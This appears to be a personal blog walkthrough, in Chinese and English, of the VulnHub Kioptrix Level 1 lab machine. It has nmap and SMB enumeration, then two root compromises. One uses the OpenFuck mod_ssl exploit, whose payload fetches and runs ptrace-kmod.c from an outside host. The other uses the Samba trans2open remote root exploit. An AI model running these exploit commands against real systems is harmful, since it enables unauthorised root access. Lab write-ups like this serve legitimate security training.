Kioptrix: Level 1 (#1) 介紹與載點
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
先利用nmap或是netdiscover, arp-scan偵測同網段的主機
三選一就可以
nmap -sP 192.168.112.0/24
netdiscover -r 192.168.112.0/24
arp-scan 192.168.112.0/24掃描完的結果如下
root@hackercat:~# nmap -sP 192.168.112.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 03:51 EST
Nmap scan report for 192.168.112.1
Host is up (0.00098s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.112.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F7:2E:D5 (VMware)
Nmap scan report for 192.168.112.252
Host is up (0.00063s latency).
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Nmap scan report for 192.168.112.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:E0:3D:E8 (VMware)
Nmap scan report for 192.168.112.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.01 seconds Currently scanning: Finished! | Screen View: Unique Hosts
14 Captured ARP Req/Rep packets, from 4 hosts. Total size: 840
____________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
---------------------------------------------------
192.168.112.1 00:50:56:c0:00:08 11 660 VMware, Inc.
192.168.112.2 00:50:56:f7:2e:d5 1 60 VMware, Inc.
192.168.112.252 00:0c:29:e1:8c:82 1 60 VMware, Inc.
192.168.112.254 00:50:56:e0:3d:e8 1 60 VMware, Inc.root@hackercat:~# arp-scan 192.168.112.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:87:73:e8, IPv4: 192.168.112.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.112.2 00:50:56:f7:2e:d5 VMware, Inc.
192.168.112.1 00:50:56:c0:00:08 VMware, Inc.
192.168.112.252 00:0c:29:e1:8c:82 VMware, Inc.
192.168.112.254 00:50:56:e0:3d:e8 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.478 seconds (103.31 hosts/sec). 4 respondedso we know the Target IP is 192.168.112.252
then we need run port scan
Port Scan結果如下
we find
22 ssh
80 http
139 samba
443 https
111, 1024 rpc
default script netbios information
maybe can try this way
root@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_allPortTCP.txt
# Nmap 7.80 scan initiated Sun Feb 2 03:55:02 2020 as: nmap -v -sV -Pn -sC -p- -oN 192.168.112.252_allPortTCP.txt 192.168.112.252
Nmap scan report for 192.168.112.252
Host is up (0.0041s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-02-02T09:58:05+00:00; +1h01m48s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Host script results:
|_clock-skew: 1h01m47s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MYGROUP<00> Flags: <group><active>
| MYGROUP<1d> Flags: <unique><active>
|_ MYGROUP<1e> Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 2 03:57:17 2020 -- 1 IP address (1 host up) scanned in 134.75 secondsroot@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_UDP.txt
# Nmap 7.80 scan initiated Sun Feb 2 03:56:02 2020 as: nmap -v -sU -Pn -oN 192.168.112.252_UDP.txt 192.168.112.252
Increasing send delay for 192.168.112.252 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 192.168.112.252
Host is up (0.00087s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
111/udp open rpcbind
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
1024/udp open|filtered unknown
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Feb 2 04:14:08 2020 -- 1 IP address (1 host up) scanned in 1086.03 seconds查看Web
80 port HTTP web and 443 port HTTPS have same web
use dirb 簡單的爆破一下路徑
dirb http://192.168.112.252 -o dirb_http.txt看看netbios, smb有甚麼有趣的
nmblookup -A 192.168.112.252
nbtscan 192.168.112.252
smbmap -H 192.168.112.252
enum4linux -a 192.168.112.252結果如下
nbtscan其實比較適合用整個網段偵查
譬如nbtscan 192.168.112.0/24
有發現似乎可以找到一些可能有用的資訊
可以嘗試用rpcclient連線看看
如果說可以用空的帳號密碼登入成功
在enum4linux掃描的時候就會有測試出來
root@hackercat:~/vulnhub/kioptrix-level-1# nmblookup -A 192.168.112.252
Looking up status of 192.168.112.252
KIOPTRIX <00> - B <ACTIVE>
KIOPTRIX <03> - B <ACTIVE>
KIOPTRIX <20> - B <ACTIVE>
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
MYGROUP <00> - <GROUP> B <ACTIVE>
MYGROUP <1d> - B <ACTIVE>
MYGROUP <1e> - <GROUP> B <ACTIVE>
MAC Address = 00-00-00-00-00-00root@hackercat:~/vulnhub/kioptrix-level-1# nbtscan 192.168.112.252
Doing NBT name scan for addresses from 192.168.112.252
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.112.252 KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00root@hackercat:~/vulnhub/kioptrix-level-1# smbmap -H 192.168.112.252
[+] Finding open SMB ports....root@hackercat:~/vulnhub/kioptrix-level-1# enum4linux -a 192.168.112.252
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 2 04:09:03 2020
==========================
| Target Information |
==========================
Target ........... 192.168.112.252
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.112.252 |
=======================================================
[+] Got domain/workgroup name: MYGROUP
===============================================
| Nbtstat Information for 192.168.112.252 |
===============================================
Looking up status of 192.168.112.252
KIOPTRIX <00> - B <ACTIVE> Workstation Service
KIOPTRIX <03> - B <ACTIVE> Messenger Service
KIOPTRIX <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MYGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MYGROUP <1d> - B <ACTIVE> Master Browser
MYGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
========================================
| Session Check on 192.168.112.252 |
========================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.rpcclient -U "" 192.168.112.252
或者是
rpcclient -U="root" 192.168.112.252用searchsploit找一下有沒有相關服務的exploit
searchsploit openssh
searchsploit apache 1.3
searchsploit openssl看起來apache mod_ssl <2.8.7 openssl的poc比較有可能有用
有兩個可以用
一個是764.c一個是47080.c
一開始先用764.c
後來覺得怪怪的
決定改用47080.c
那compile過程遇到error
打開47080.c來看
開頭註解有提到
需要安裝一下libary
apt install libssl-dev
然後編譯照它的語法
gcc -o OpenFuck 47080.c -lcrypto完成後會多了一個OpenFuck檔案
執行一下看看會顯示甚麼
發現也很nice的提醒你usage
./OpenFuck 192.168.112.252 443 -c 45發現我看錯用法了XD
用法是這樣
Usage: ./OpenFuck target box [port] [-c N]target不是要填入目標IP
target而是要填入下方supported offset清單中
目標相對應的版本
後面那個box才是填IP
我們前面port scan時已經知道
版本是
Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
對照清單應該是… 好像很多個XD
隨便先選了0x5e 試了失敗
root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x5f 192.168.112.252 443 -c 45
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
Good Bye!利用grep找一下 發現事有1.3.20的
root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck | grep 1.3.20
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)也就6a跟6b兩個
就決定是你們了
試了一下6a failed
but 6b successed!
root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x6b 192.168.112.252 443 -c 45
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--06:09:30-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
06:09:31 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]
gcc: file path prefix `/usr/bin' never used
[+] Attached to 6241
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root這只是拿到root的其中一種方法
換個方法
一樣是用searchsploit
這是找看看samba的, 看有沒有在Linux下的Remote poc
因為大小寫關係 所以我用inux跟emote
searchsploit samba | grep inux | grep emote決定試試看
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution一樣把poc複製到目錄下編譯執行看看
結果發現很不錯的還有介紹怎麼使用
root@hackercat:~/vulnhub/kioptrix-level-1# cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/vulnhub/kioptrix-level-1/
root@hackercat:~/vulnhub/kioptrix-level-1# ls
10.c 192.168.112.252_allPortTCP.txt 192.168.112.252_UDP.txt 19975.pl 47080.c 764.c dirb_http.txt OpenFuck
root@hackercat:~/vulnhub/kioptrix-level-1# gcc 10.c -o 10
root@hackercat:~/vulnhub/kioptrix-level-1# ./10
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./10 [-bBcCdfprsStv] [host]
-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode結果隨便試一下就成功XD
root@hackercat:~/vulnhub/kioptrix-level-1# ./10 -v -b 0 192.168.112.252
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root後來才知道原來這裡面也會有flag
用find去找找看不同關鍵字
find / -iname *flag* 2>&1 | grep -v "Permission denied"用flag去找 有看到一些看起來像是的東西
不過cat之後都怪怪的
結果我後來是用root這個關鍵字找到
在mail資料夾的下面
cat /var/spool/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...
From root Sun Feb 2 04:45:16 2020
Return-Path: <root@kioptrix.level1>
Received: (from root@localhost)
by kioptrix.level1 (8.11.6/8.11.6) id 0129jG501136
for root; Sun, 2 Feb 2020 04:45:16 -0500
Date: Sun, 2 Feb 2020 04:45:16 -0500
From: root <root@kioptrix.level1>
Message-Id: <202002020945.0129jG501136@kioptrix.level1>
To: root@kioptrix.level1
Subject: LogWatch for kioptrix.level1